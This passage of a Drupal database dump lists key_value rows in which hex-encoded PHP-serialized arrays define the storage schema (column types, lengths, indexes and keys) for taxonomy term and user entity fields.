('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.default_langcode', 0x613a323a7b733a32343a227461786f6e6f6d795f7465726d5f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a2264656661756c745f6c616e67636f6465223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32383a227461786f6e6f6d795f7465726d5f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a2264656661756c745f6c616e67636f6465223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.description', 0x613a323a7b733a32343a227461786f6e6f6d795f7465726d5f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a323a7b733a31383a226465736372697074696f6e5f5f76616c7565223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d733a31393a226465736372697074696f6e5f5f666f726d6174223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a303a7b7d7d733a32383a227461786f6e6f6d795f7465726d5f6669656c645f7265766973696f6e223b613a323a7b733a363a226669656c6473223b613a323a7b733a31383a226465736372697074696f6e5f5f76616c7565223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d733a31393a226465736372697074696f6e5f5f666f726d6174223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a34303a227461786f6e6f6d795f7465726d5f6669656c645f5f6465736372697074696f6e5f5f666f726d6174223b613a313a7b693a303b733a31393a226465736372697074696f6e5f5f666f726d6174223b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.langcode', 0x613a343a7b733a31383a227461786f6e6f6d795f7465726d5f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32343a227461786f6e6f6d795f7465726d5f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32383a227461786f6e6f6d795f7465726d5f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.name', 0x613a323a7b733a32343a227461786f6e6f6d795f7465726d5f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a226e616d65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a32353a227461786f6e6f6d795f7465726d5f6669656c645f5f6e616d65223b613a313a7b693a303b733a343a226e616d65223b7d7d7d733a32383a227461786f6e6f6d795f7465726d5f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a343a226e616d65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.parent', 0x613a323a7b733a32313a227461786f6e6f6d795f7465726d5f5f706172656e74223b613a343a7b733a31313a226465736372697074696f6e223b733a34343a22446174612073746f7261676520666f72207461786f6e6f6d795f7465726d206669656c6420706172656e742e223b733a363a226669656c6473223b613a373a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a31363a22706172656e745f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a31363a22706172656e745f7461726765745f6964223b613a313a7b693a303b733a31363a22706172656e745f7461726765745f6964223b7d733a32323a2262756e646c655f64656c74615f7461726765745f6964223b613a333a7b693a303b733a363a2262756e646c65223b693a313b733a353a2264656c7461223b693a323b733a31363a22706172656e745f7461726765745f6964223b7d7d7d733a33303a227461786f6e6f6d795f7465726d5f7265766973696f6e5f5f706172656e74223b613a343a7b733a31313a226465736372697074696f6e223b733a35363a225265766973696f6e20617263686976652073746f7261676520666f72207461786f6e6f6d795f7465726d206669656c6420706172656e742e223b733a363a226669656c6473223b613a373a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a31363a22706172656e745f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a31363a22706172656e745f7461726765745f6964223b613a313a7b693a303b733a31363a22706172656e745f7461726765745f6964223b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.revision_created', 0x613a313a7b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a227265766973696f6e5f63726561746564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.revision_default', 0x613a313a7b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a227265766973696f6e5f64656661756c74223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.revision_id', 0x613a343a7b733a31383a227461786f6e6f6d795f7465726d5f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a32343a227461786f6e6f6d795f7465726d5f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32383a227461786f6e6f6d795f7465726d5f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.revision_log_message', 0x613a313a7b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32303a227265766973696f6e5f6c6f675f6d657373616765223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.revision_translation_affected', 0x613a323a7b733a32343a227461786f6e6f6d795f7465726d5f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a32383a227461786f6e6f6d795f7465726d5f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.revision_user', 0x613a313a7b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b613a323a7b733a363a226669656c6473223b613a313a7b733a31333a227265766973696f6e5f75736572223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a34353a227461786f6e6f6d795f7465726d5f6669656c645f5f7265766973696f6e5f757365725f5f7461726765745f6964223b613a313a7b693a303b733a31333a227265766973696f6e5f75736572223b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.status', 0x613a323a7b733a32343a227461786f6e6f6d795f7465726d5f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32383a227461786f6e6f6d795f7465726d5f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.tid', 0x613a343a7b733a31383a227461786f6e6f6d795f7465726d5f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22746964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32343a227461786f6e6f6d795f7465726d5f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22746964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22746964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a32383a227461786f6e6f6d795f7465726d5f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22746964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.uuid', 0x613a313a7b733a31383a227461786f6e6f6d795f7465726d5f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2275756964223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a33323a227461786f6e6f6d795f7465726d5f6669656c645f5f757569645f5f76616c7565223b613a313a7b693a303b733a343a2275756964223b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.vid', 0x613a323a7b733a31383a227461786f6e6f6d795f7465726d5f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a333a22766964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a33353a227461786f6e6f6d795f7465726d5f6669656c645f5f7669645f5f7461726765745f6964223b613a313a7b693a303b733a333a22766964223b7d7d7d733a32343a227461786f6e6f6d795f7465726d5f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a333a22766964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a303a7b7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.weight', 0x613a313a7b733a32343a227461786f6e6f6d795f7465726d5f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22776569676874223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a303b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'user.entity_schema_data', 0x613a323a7b733a353a227573657273223b613a313a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a333a22756964223b7d7d733a31363a2275736572735f6669656c645f64617461223b613a333a7b733a31313a227072696d617279206b6579223b613a323a7b693a303b733a333a22756964223b693a313b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a313a7b733a33363a22757365725f5f69645f5f64656661756c745f6c616e67636f64655f5f6c616e67636f6465223b613a333a7b693a303b733a333a22756964223b693a313b733a31363a2264656661756c745f6c616e67636f6465223b693a323b733a383a226c616e67636f6465223b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a31303a22757365725f5f6e616d65223b613a323a7b693a303b733a343a226e616d65223b693a313b733a383a226c616e67636f6465223b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.access', 0x613a313a7b733a31363a2275736572735f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a363a22616363657373223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a31383a22757365725f6669656c645f5f616363657373223b613a313a7b693a303b733a363a22616363657373223b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.changed', 0x613a313a7b733a31363a2275736572735f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a226368616e676564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.created', 0x613a313a7b733a31363a2275736572735f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a373a2263726561746564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a31393a22757365725f6669656c645f5f63726561746564223b613a313a7b693a303b733a373a2263726561746564223b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.default_langcode', 0x613a313a7b733a31363a2275736572735f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a2264656661756c745f6c616e67636f6465223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.init', 0x613a313a7b733a31363a2275736572735f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a343a22696e6974223b613a333a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235343b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.langcode', 0x613a323a7b733a353a227573657273223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31363a2275736572735f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.login', 0x613a313a7b733a31363a2275736572735f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a353a226c6f67696e223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.mail', 0x613a313a7b733a31363a2275736572735f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a226d61696c223b613a333a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235343b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a31363a22757365725f6669656c645f5f6d61696c223b613a313a7b693a303b733a343a226d61696c223b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.name', 0x613a313a7b733a31363a2275736572735f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a343a226e616d65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a36303b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.pass', 0x613a313a7b733a31363a2275736572735f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a343a2270617373223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.preferred_admin_langcode', 0x613a313a7b733a31363a2275736572735f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32343a227072656665727265645f61646d696e5f6c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.preferred_langcode', 0x613a313a7b733a31363a2275736572735f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31383a227072656665727265645f6c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.roles', 0x613a313a7b733a31313a22757365725f5f726f6c6573223b613a343a7b733a31313a226465736372697074696f6e223b733a33343a22446174612073746f7261676520666f722075736572206669656c6420726f6c65732e223b733a363a226669656c6473223b613a373a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a3131343a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f2c20776869636820666f7220616e20756e76657273696f6e656420656e746974792074797065206973207468652073616d652061732074686520656e74697479206964223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a31353a22726f6c65735f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a31353a22726f6c65735f7461726765745f6964223b613a313a7b693a303b733a31353a22726f6c65735f7461726765745f6964223b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.status', 0x613a313a7b733a31363a2275736572735f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.timezone', 0x613a313a7b733a31363a2275736572735f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a2274696d657a6f6e65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a33323b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.uid', 0x613a323a7b733a353a227573657273223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22756964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31363a2275736572735f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22756964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
